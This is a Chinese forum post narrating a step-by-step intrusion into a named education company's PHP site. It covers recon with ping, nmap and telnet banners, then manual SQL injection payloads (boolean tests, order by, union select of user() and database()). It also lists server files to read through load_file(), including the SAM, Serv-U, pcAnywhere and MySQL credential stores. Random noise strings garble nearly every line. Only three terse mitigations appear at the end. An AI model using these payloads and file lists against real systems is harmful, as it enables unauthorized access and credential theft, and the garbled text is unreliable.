中国网络渗透测试联盟
标题:
记一次Linux系统PHP注入入侵检测
[打印本页]
作者:
admin
时间:
2013-2-16 22:23
标题:
记一次Linux系统PHP注入入侵检测
题记:
6 e+ s9 a6 L) j8 C: ^; Q
一位朋友在某教育公司,一套网络教育平台。一年前,在2008年8月份的时候,我看到了这套平台,当时发现了个注入漏洞,测试了一下,得到一个可用帐户后就没有再继续下去。今天7月,又说到此事,我决定继续下去……
- T3 Q0 l3 Y4 q3 x2 [
第一步:获取需要的信息
) n/ A. F& d5 u8 y( P; L4 K8 p- D
由于之前测试过,知道此系统某处存在SQL注入漏洞。但由于时隔一年,岁月的远去已经深深的隐藏了那个SQL注入漏洞的地址,现在需要重新收集服务器有用信息。
* W& U+ T) I0 }" x
注:以下为保护特用XXX代替敏感信息
( o) b- M# d: r; Y+ v( \
顺手先PING了一下他们的域名:
, u8 b8 z" E; X( H
ping XXX.XXX.XXX.XXX(本文约定:用XXX.XXX.XXX.XXX代表测试IP和域名)
: I9 {7 ?( q+ ^# a7 E! M
64 bytes from *********: icmp_seq=1 ttl=246 time=1.87 ms
( f, w$ C/ E3 V B
顺便了解一下TTL,学好基础知识才能一路顺风:
+ r, z3 H5 V2 Y
TTL:(Time To Live ) 生存时间
$ v- c- v4 C4 D; X! X! x
指定数据包被路由器丢弃之前允许通过的网段数量。
: I& r0 a, A( c8 e1 q* N) B
TTL 是由发送主机设置的,以防止数据包不断在 IP 互联网络上永不终止地循环。转发 IP 数据包时,要求路由器至少将 TTL 减小 1。
' Z( S7 l$ k( h
使用PING时涉及到的 ICMP 报文类型
& r! U7 A. l8 R0 \# f: A
一个为ICMP请求回显(ICMP Echo Request)
A6 `0 ?* k, \; @: a2 M
一个为ICMP回显应答(ICMP Echo Reply)
9 K: _# T+ K* T( \9 v
TTL 字段值可以帮助我们识别操作系统类型。
9 j5 E( J V3 _4 Z5 y6 t
UNIX 及类 UNIX 操作系统 ICMP 回显应答的 TTL 字段值为 255
+ ]6 w! P+ M7 T. H" x3 X- u: e! H3 G
Compaq Tru64 5.0 ICMP 回显应答的 TTL 字段值为 64
5 c9 [7 C* r2 p, ^+ m6 a
微软 Windows NT/2K操作系统 ICMP 回显应答的 TTL 字段值为 128
2 U. f( |& n( D
微软 Windows 95 操作系统 ICMP 回显应答的 TTL 字段值为 32
z4 e, t2 e c% _
当然,返回的TTL值是相同的
3 |: P8 E3 v" L1 F( G' p
但有些情况下有所特殊
4 J4 ^. F) F) c5 z5 _4 ^
LINUX Kernel 2.2.x & 2.4.x ICMP 回显应答的 TTL 字段值为 64
% O7 c2 @: {. \% F
FreeBSD 4.1, 4.0, 3.4;
# B4 X3 e9 M" \8 V, o# D% H, Z
Sun Solaris 2.5.1, 2.6, 2.7, 2.8;
# N2 @; ^: S1 V! R, h s
OpenBSD 2.6, 2.7,
- B+ D2 @+ D' i! L# p' Y; F$ r
NetBSD
* Q0 P0 f: v( j( ~5 Z- |0 Q) j ]
HP UX 10.20
2 T/ z4 _+ g5 c `) ?% ]
ICMP 回显应答的 TTL 字段值为 255
2 r# s1 J) M3 z' l: z
Windows 95/98/98SE
$ K: f# z; }1 X
Windows ME
% |- w& ]2 p/ g) O0 r& L; W" I
ICMP 回显应答的 TTL 字段值为 32
. X; R2 e+ B. A- Q
Windows NT4 WRKS
" w& F( A0 N6 T
Windows NT4 Server
& D& S1 y! H& r% ]7 m0 i/ C# y6 n
Windows 2000
+ K* E: l5 S" C X c$ I
Windows XP
; |* C/ Y. u& A c+ [6 |
ICMP 回显应答的 TTL 字段值为 128
3 S d9 f, y5 y- R
这样,我们就可以通过这种方法来辨别操作系统
/ C- P4 ^ {+ l8 U
TTL值的注册表位置HKEY_LOCAL_MACHINE\SYSTEM \CurrentControlSet\Services\Tcpip\Parameters 其中有个DefaultTTL的DWORD值,其数据就是默认的TTL值了,我们可以修改,但不能大于十进制的255
' p6 T9 f, w0 H; d' S3 |0 X) d) S
用NMAP扫描一下:
# \1 w& n( {3 D% }
nmap -sT -O XXX.XXX.XXX.XXX
# q* f+ J; x' Z' a% U
如果没有装WinPcap则会弹出提示:
" P" T) W; L& a- T$ V
WARNING: Could not import all necessary WinPcap functions. You may need to upgr
# v9 W& L. ^# C
ade to version 3.1 or higher from
http://www.winpcap.org.
Resorting to connect(
, U) V0 P; `& t+ H
) mode — Nmap may not function completely
( N# o; w7 y( i4 q: T1 Y( j! T
TCP/IP fingerprinting (for OS scan) requires that WinPcap version 3.1 or higher
: ^0 P& j1 C2 X4 Z7 \
and iphlpapi.dll be installed. You seem to be missing one or both of these. Win
7 x$ L5 ]% V( O3 S: S+ r5 T; a
pcap is available from
http://www.winpcap.org.
iphlpapi.dll comes with Win98 an
% ?# ^' c1 l4 ^' x! n/ }/ w! _( G
d later operating sytems and NT 4.0 with SP4 or greater. For previous windows v
) M+ |2 m2 E2 z" J- q
ersions, you may be able to take iphlpapi.dll from another system and place it i
3 q; p) f8 H) q1 v( V
n your system32 dir (e.g. c:\windows\system32).
. G6 u1 g, R$ b9 o/ q
QUITTING!
: p2 Q5 Z$ ]' | ~, w, E# e
到这里下载:
http://www.winpcap.org/install/bin/WinPcap_4_1_1.exe
+ _: E: @0 b0 l+ J& i; N
安装后继续执行刚才的命令,等待扫描完毕后得到入下信息:
, }0 m% i/ b( K: m; ?
Interesting ports on XXX.XXX.XXX.XXX:
. Z' Q! [* q7 v0 r: P% H! N
Not shown: 986 closed ports
: {0 a" q) o/ E* p1 X8 a [+ S
PORT STATE SERVICE
# G* e' `* T- |! L1 ~ V
21/tcp open ftp
( j& g+ i3 Q: D) P V
22/tcp open ssh
- d+ o; O% B; L- {
23/tcp open telnet
& f4 m8 {9 q1 O3 c+ [
80/tcp open http
2 d* R$ X7 M; B* t
111/tcp open rpcbind
& ]( k0 g8 N e- y+ p
135/tcp filtered msrpc
8 L# [7 p- k8 S5 Q
139/tcp filtered netbios-ssn
4 `6 N& }1 A5 Z4 ^
445/tcp filtered microsoft-ds
6 p5 @8 Y8 Q% f; `
513/tcp open login
" R! C- ^! i% x' A5 P( O
514/tcp open shell
8 y1 |7 r* S3 \' W4 [6 q- g
593/tcp filtered http-rpc-epmap
: l4 \, y% O% S, A
1720/tcp filtered H.323/Q.931
* Q' _/ C) d) G4 |" ^
3306/tcp open mysql
# h, B9 c7 l; a6 }% c2 P4 N j' O- i. a
4444/tcp filtered krb524
$ g6 u- f0 @8 Z4 N& r( k
Device type: WAP
: F) a; J( p+ u0 |6 a! s3 x! t( C
Running: Linux 2.4.X
, T6 n. o& Y# [* S
OS details: DD-WRT (Linux 2.4.35s)
1 a* X. f- `* F. t* W/ P- ]4 n
Network Distance: 13 hops
/ G% \. K( d# _& \: _$ w/ F- ?
看到SSH22端口是开着的,打开putty试一下,看是否可以正常连接:
! b |# ~ m4 ]5 w6 }
login as:
2 x" X. U& a0 U1 w/ c- O
Telnet23端口也是开着的,用telnet 命令链接一下:
& Q k4 F& F3 R$ a2 j
telnet XXX.XXX.XXX.XXX
* J, d9 Y5 O0 g! a4 f
提示:
# u% O8 {7 ^- R; A
Red Hat Enterprise Linux Server release 5.2 (Tikanga)
, v/ ~" g$ N5 a" ^7 Y8 i& L, r
Kernel 2.6.18-92.el5PAE on an i686
7 i$ g/ p& T ]; [! _
login:
, g8 s8 H3 h, z$ U: m4 G/ g) q) r6 v
获取HTTP头信息:
/ x8 i/ W! z' H
在本地执行如下PHP代码
1 p1 a1 g$ l5 C( k% T
<?php
# c5 i( o2 E1 i2 ~
$url = ‘XXX.XXX.XXX.XXX’;
! A8 x3 w! d0 ~! `% n2 R
print_r(get_headers($url));
5 W+ t) _) C' f1 J3 t; q; k- l
print_r(get_headers($url, 1));
7 ]) g* t" s4 [( c6 `1 y
?>
' w# O' i! `: d% G: G3 S
将以上代码保存为PHP文件,执行:
: d' [$ r5 J6 N0 W
Array ( [0] => HTTP/1.1 200 OK [1] => Server: nginx/0.7.61 [2] => Date: Mon, 02 Nov 2009 09:06:48 GMT [3] => Content-Type: text/html; charset=gb2312,gbk,utf-8 [4] => Content-Length: 75 [5] => Last-Modified: Thu, 20 Aug 2009 19:35:37 GMT [6] => Connection: close [7] => Accept-Ranges: bytes ) Array ( [0] => HTTP/1.1 200 OK [Server] => nginx/0.7.61 [Date] => Mon, 02 Nov 2009 09:06:48 GMT [Content-Type] => text/html; charset=gb2312,gbk,utf-8 [Content-Length] => 75 [Last-Modified] => Thu, 20 Aug 2009 19:35:37 GMT [Connection] => close [Accept-Ranges] => bytes )
& \# L" ]5 O5 W$ E% U
现在可以得出结论:
6 ^% C0 C" L$ L( u' k9 m1 ^; r
系统版本:Red Hat Enterprise Linux Server release 5.2 (Tikanga)
. M* O2 f) l) b3 t/ U- \2 b
内核版本:Kernel 2.6.18-92.el5PAE on an i686
, w/ P7 y) b+ K1 @8 q8 s% e0 X" ], j
WEB服务器版本:nginx/0.7.61
9 Z- a- w6 X# l$ M
第二步,开始测试寻找漏洞
- g3 Q: X: x) [9 s3 l+ Q
分析是否存在注入漏洞,因为上次曾发现存在过,所以注入则是我们的首选。
6 l( ^8 V1 I# h& z
1、敏感地址:站内存在有类似:
http://www.fovweb.com/XXX.php?id=123
这种地址,属动态传参的
# b0 z% t3 [" X; U& R4 j% f
2、测试方法:在地址后加 and 1=1 和 and 1=2 测试
) c# b9 v o. N- U; ~) N6 l+ n
http://www.fovweb.com/XXX.php?id=123
and 1=1 返回正常
% `* ]3 a. I; @/ {
http://www.fovweb.com/XXX.php?id=123
and 1=2 返回错误
0 V$ c; l9 G L7 M
恭喜,两次返回结果不同,则很有可能存在未过滤敏感字符而存在SQL注入漏洞,我们继续
5 P& p$ r, V0 g* p/ ?: O
3、手工注入:
- p; M+ [) @. Y( ]; Z& V
注入也应该有个思路,不能随便碰运气,要记住入侵检测不是靠运气而走下去的,要靠的是清晰的思路、过硬的技术、很全的知识面。
6 w2 I- Y( d" R8 H, l6 t
3.1 猜测当前表字段数
1 P# w3 J9 x, p. E
http://www.fovweb.com/XXX.php?id=123
and 1=1 order by 10
) Y9 d0 e9 @" M( X, Q# Z ^( {8 w! u
此处猜测有个简单的算法,都是有技巧的吗,呵呵
$ E) ?# P) j8 u: X5 B, i
算法简单如下:
0 ]# J6 I' B9 W) w
第一步:根据页面信息,大概估算一个数值,这个是要靠一定的经验了;
2 V; {7 _) R4 l$ B
第二步:取中算法,好比是10,如果返回错误,则取中间值5进行下一次猜测;
0 p4 U* a1 \0 T9 Q; d+ i
需要注意:如果所选数值在字段数范围内即小于等于,则会(返回正常);如果所选数值在字段范围外即大于等于,则会(返回错误)。
: f/ i: T( y# j8 ?0 q
以此来判断,是否过界,配合取中算法猜出字段数。
- c& Z( P" P Y) S; |8 y
举例:
3 _% p n; w6 a" X
http://www.fovweb.com/XXX.php?id=123
and 1=1 order by 3 返回正常
9 Q E. I' Y- Q1 K- z) z v
http://www.fovweb.com/XXX.php?id=123
and 1=1 order by 4 返回错误
1 Q8 A4 r2 d' r! z
此时3则为我们要找的字段数。
" p3 E& T v9 s+ S
3.2 配合union联合查询字段在页面所位置
% N; v& g0 G! r3 Y
我们已经知道了字段数为3,此时则可以做如下操作:
4 _9 W( b; J( x/ b6 b
http://www.fovweb.com/XXX.php?id=123
and 1=2 union select 1,2,3
) \) o- Q& U* ?+ e
! | [8 ?8 P* i
这样就可以测试到哪些字段在页面上有所显示了,如图:
' y0 c( q( w- L! O9 y3 `- ^
7 L/ E B# O1 d' m- @
3.3 查敏感信息
7 E$ z! R+ A4 ~6 u( b: R
这也是个思路问题,我们需要什么,其实到了这一步已经能做什么多事情了。
, S. m6 m% x8 Y1 q
http://www.fovweb.com/XXX.php?id=123
and 1=2 union select 1,user(),database()
2 ]) k* E; p. Y: G
3.3.1 先查数据库用户、数据库名,以备后用,如图:
" m$ C, P1 F+ C' M1 a6 O- \
( H7 g. l* r& @# I2 z* Y
得到数据库用户为root、数据库名为DBxx;
8 ] \( T$ P( a' Y" b
3.3.2 查配置文件
# ?5 n3 K. |/ C' {4 X
查配置文件,就是指查看系统敏感的文件,如web服务器配置文件等。
0 U `$ B, o0 G
查看文件有一定的条件限制:
% m5 m8 E* U2 j, D% W
欲读取文件必须在服务器上
2 X, \% N" f3 k# ^/ F0 u
必须指定文件完整的路径
7 U7 A' V# H0 ]# i8 b0 z* J
必须有权限读取并且文件必须完全可读
2 O% m/ q0 y0 N4 W0 ]9 I2 m
欲读取文件必须小于 max_allowed_packet
2 l) h; V. x4 b( u& [
MYSQL注入中,load_file()函数在获得webshell以及提权过程中起着十分重要的作用,常被用来读取各种配置文件。
- {7 y6 a/ C: G1 _
常用的一些:
2 H, u6 Y6 W9 O9 f: l5 G
/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
8 F2 j/ L8 \/ ~+ c2 n- `* }0 l
/usr/local/apache2/conf/httpd.conf
- F3 c/ H- F7 I! O- C6 b
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
* S, ~" r& y9 F/ W B/ S, ~# B) w9 c
/usr/local/app/php5/lib/php.ini //PHP相关设置
. J+ i8 _. c5 F' _( R& W
/etc/sysconfig/iptables //从中得到防火墙规则策略
+ ?' }. }0 Q: g O8 b2 a
/etc/httpd/conf/httpd.conf // apache配置文件
4 [* p7 o0 V$ o
/etc/rsyncd.conf //同步程序配置文件
5 T, A, \! D o, O
/etc/sysconfig/network-scripts/ifcfg-eth0 //查看IP.
+ i2 `. V$ U7 m4 f3 G. U
/etc/my.cnf //mysql的配置文件
$ |6 Y6 E" j4 I" d
/etc/redhat-release //系统版本
5 H: y8 a3 J8 X) G# i" d0 |8 a
/etc/issue
# d/ E5 |! R) C; b
/etc/issue.net
2 l. m! l5 O' ?8 s: X) J+ C8 c& _
c:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码
# `) R! l! f5 o& j5 |
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存储了虚拟主机网站路径和密码
" g: X# H2 [$ T9 a
c:\Program Files\Serv-U\ServUDaemon.ini
U: p$ B" f' D/ A# ^" H
c:\windows\my.ini //MYSQL配置文件
3 k8 {7 r" _. |; J$ y, I( w
c:\windows\system32\inetsrv\MetaBase.xml //IIS配置文件
, f1 m1 C( V; Q F: N3 a x
等等。实际上,load_file()的作用不止于此,它还可以用来读取系统中的二进制文件,
. K$ |! ^+ F9 d. \+ A
c:\windows\repair\sam //存储了WINDOWS系统初次安装的密码
8 o& Q6 e- s% R- V( w
c:\Program Files\ Serv-U\ServUAdmin.exe //6.0版本以前的serv-u管理员密码存储于此
) O. f+ q+ u5 {1 o9 J$ g _
c:\Program Files\RhinoSoft.com\ServUDaemon.exe
6 \+ W% K7 Q& L
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
% G1 [* C! v8 q6 J" w
//存储了pcAnywhere的登陆密码
! V. ^3 D2 {; E0 e M/ E6 L
由于之前得到信息,此台服务器是采用的nginx做的Web服务器,那我们就来试着找一下nginx的安装路径吧。
2 g! a; z) t" T3 Z! Y
这个没有技术性可言,纯靠经验和运气,由于很少用nginx不了解,我就先到网上搜索常用的安装路径,以及比较好的配置文档中的安装路径进行测试,最终,得到nginx安装路径“/usr/local/nginx/conf/nginx.conf”。
- Y3 ?9 G& L6 I
最后:防范措施
% x- S; N. f3 Y6 G
1、修复PHP注入漏洞;
4 l8 L8 @+ g" I4 g! z# H1 D
2、Mysql使用普通权限的用户;
% i" `$ V. `* M. O0 I
3、升级linux内核至最新版本;
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2